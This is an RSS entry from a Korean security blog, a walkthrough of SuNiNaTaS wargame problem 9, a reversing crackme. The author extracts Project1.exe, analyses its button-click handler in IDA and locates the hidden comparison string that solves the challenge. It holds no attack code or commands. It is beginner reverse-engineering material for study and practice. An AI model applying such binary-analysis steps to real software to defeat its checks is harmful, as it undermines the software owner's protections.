      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;241&quot; data-origin-height=&quot;148&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/FrJED/btsFEX32h7k/0dASFvlkyuxYyGI7pbT43k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/FrJED/btsFEX32h7k/0dASFvlkyuxYyGI7pbT43k/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/FrJED/btsFEX32h7k/0dASFvlkyuxYyGI7pbT43k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FFrJED%2FbtsFEX32h7k%2F0dASFvlkyuxYyGI7pbT43k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;241&quot; height=&quot;148&quot; data-origin-width=&quot;241&quot; data-origin-height=&quot;148&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;SuNiNaTaS 에서 제공하는 아홉번째 문제&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;리버싱으로 분류된 문제이다.&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;revenue_unit_wrap&quot;&gt;
  &lt;div class=&quot;revenue_unit_item adsense responsive&quot;&gt;
    &lt;div class=&quot;revenue_unit_info&quot;&gt;반응형&lt;/div&gt;
    &lt;script src=&quot;//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js&quot; async=&quot;async&quot;&gt;&lt;/script&gt;
    &lt;ins class=&quot;adsbygoogle&quot; style=&quot;display: block;&quot; data-ad-host=&quot;ca-host-pub-9691043933427338&quot; data-ad-client=&quot;ca-pub-6369827649108732&quot; data-ad-format=&quot;auto&quot;&gt;&lt;/ins&gt;
    &lt;script&gt;(adsbygoogle = window.adsbygoogle || []).push({});&lt;/script&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;397&quot; data-origin-height=&quot;242&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bLyLoO/btsFFM2e1iI/3Bafos3pua8Xxc1jeFvu5k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bLyLoO/btsFFM2e1iI/3Bafos3pua8Xxc1jeFvu5k/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bLyLoO/btsFFM2e1iI/3Bafos3pua8Xxc1jeFvu5k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbLyLoO%2FbtsFFM2e1iI%2F3Bafos3pua8Xxc1jeFvu5k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;397&quot; height=&quot;242&quot; data-origin-width=&quot;397&quot; data-origin-height=&quot;242&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;문제페이지에 들어가면&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;뭔가를 다운받도록 한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;303&quot; data-origin-height=&quot;157&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/TS9m8/btsFEZtZcuk/dKcSKmEjsyKI260Okr1cT0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/TS9m8/btsFEZtZcuk/dKcSKmEjsyKI260Okr1cT0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/TS9m8/btsFEZtZcuk/dKcSKmEjsyKI260Okr1cT0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FTS9m8%2FbtsFEZtZcuk%2FdKcSKmEjsyKI260Okr1cT0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;303&quot; height=&quot;157&quot; data-origin-width=&quot;303&quot; data-origin-height=&quot;157&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 파일은 zip 파일로&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;압축을 풀려면 비밀번호가 필요하다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;비번은 위에 나와있듯이 suninatas 이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;134&quot; data-origin-height=&quot;38&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Kzxk3/btsFGpFoLeM/4UbmgHFtpkeh9AYA64MM01/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Kzxk3/btsFGpFoLeM/4UbmgHFtpkeh9AYA64MM01/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Kzxk3/btsFGpFoLeM/4UbmgHFtpkeh9AYA64MM01/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FKzxk3%2FbtsFGpFoLeM%2F4UbmgHFtpkeh9AYA64MM01%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;134&quot; height=&quot;38&quot; data-origin-width=&quot;134&quot; data-origin-height=&quot;38&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;안에는 Project1.exe 파일이 들어있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;194&quot; data-origin-height=&quot;177&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/v6IL3/btsFGNlKsBJ/v341kmMRdDYkH96HCUQgP0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/v6IL3/btsFGNlKsBJ/v341kmMRdDYkH96HCUQgP0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/v6IL3/btsFGNlKsBJ/v341kmMRdDYkH96HCUQgP0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fv6IL3%2FbtsFGNlKsBJ%2Fv341kmMRdDYkH96HCUQgP0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;194&quot; height=&quot;177&quot; data-origin-width=&quot;194&quot; data-origin-height=&quot;177&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;실행시키면 이렇게 작은 창이 뜬다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;뭔가를 입력하고 Click! 을 눌러봤는데&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;별다른 반응이 없었다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;369&quot; data-origin-height=&quot;140&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/csK5fz/btsFF7LObII/GHMmMzIYGDZfiZu6VRjmrk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/csK5fz/btsFF7LObII/GHMmMzIYGDZfiZu6VRjmrk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/csK5fz/btsFF7LObII/GHMmMzIYGDZfiZu6VRjmrk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcsK5fz%2FbtsFF7LObII%2FGHMmMzIYGDZfiZu6VRjmrk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;369&quot; height=&quot;140&quot; data-origin-width=&quot;369&quot; data-origin-height=&quot;140&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;IDA라는 디스어셈블러를 이용해 해당 파일을 분석해봤다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;함수 목록을 살펴보는데&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;TForm1_Button1Click 가 보였다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;아마도 실행창에서 보이는 버튼을 눌렀을 때 실행되는 함수일 것이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;724&quot; data-origin-height=&quot;605&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/c7ysXO/btsFGrpKcDX/c5cnwZKKnZvb9se8rlEinK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/c7ysXO/btsFGrpKcDX/c5cnwZKKnZvb9se8rlEinK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/c7ysXO/btsFGrpKcDX/c5cnwZKKnZvb9se8rlEinK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fc7ysXO%2FbtsFGrpKcDX%2Fc5cnwZKKnZvb9se8rlEinK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;724&quot; height=&quot;605&quot; data-origin-width=&quot;724&quot; data-origin-height=&quot;605&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 함수에 들어가서 f5를 눌러 수도코드를 살펴본다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;뭔가를 비교한 다음에 참이되면 Congratulation! 이라는 메세지 박스가 뜨게 된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;424&quot; data-origin-height=&quot;43&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b8gtxM/btsFGkxHSL2/oJKbHlk4DHGVEBE2K2x8w1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b8gtxM/btsFGkxHSL2/oJKbHlk4DHGVEBE2K2x8w1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b8gtxM/btsFGkxHSL2/oJKbHlk4DHGVEBE2K2x8w1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb8gtxM%2FbtsFGkxHSL2%2FoJKbHlk4DHGVEBE2K2x8w1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;424&quot; height=&quot;43&quot; data-origin-width=&quot;424&quot; data-origin-height=&quot;43&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;비교대상인 str_XXXXXX (까만색 칠해진 부분) 을 클릭해 보면&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;숨겨진 코드를 찾을 수 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;224&quot; data-origin-height=&quot;178&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/xsp1W/btsFFRbGguQ/SbQRDGUWaIcbBhFtiTojsk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/xsp1W/btsFFRbGguQ/SbQRDGUWaIcbBhFtiTojsk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/xsp1W/btsFFRbGguQ/SbQRDGUWaIcbBhFtiTojsk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fxsp1W%2FbtsFFRbGguQ%2FSbQRDGUWaIcbBhFtiTojsk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;224&quot; height=&quot;178&quot; data-origin-width=&quot;224&quot; data-origin-height=&quot;178&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 코드를 입력하면&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;문제를 해결할 수 있다.&lt;/p&gt;</description>
      <category>워게임/SuNiNaTaS</category>
      <category>CTF</category>
      <category>IDA</category>
      <category>reversing</category>
      <category>리버싱</category>
      <category>사이버</category>
      <category>워게임</category>
      <category>정보보안</category>
      <category>정보보호</category>
      <category>해킹</category>
      <category>해킹대회</category>
      <author>SecurityMan</author>
      <guid isPermaLink="true">https://hackingstudypad.tistory.com/715</guid>
      <comments>https://hackingstudypad.tistory.com/715#entry715comment</comments>
      <pubDate>Wed, 13 Mar 2024 11:00:42 +0900</pubDate>
    </item>
  </channel>
</rss>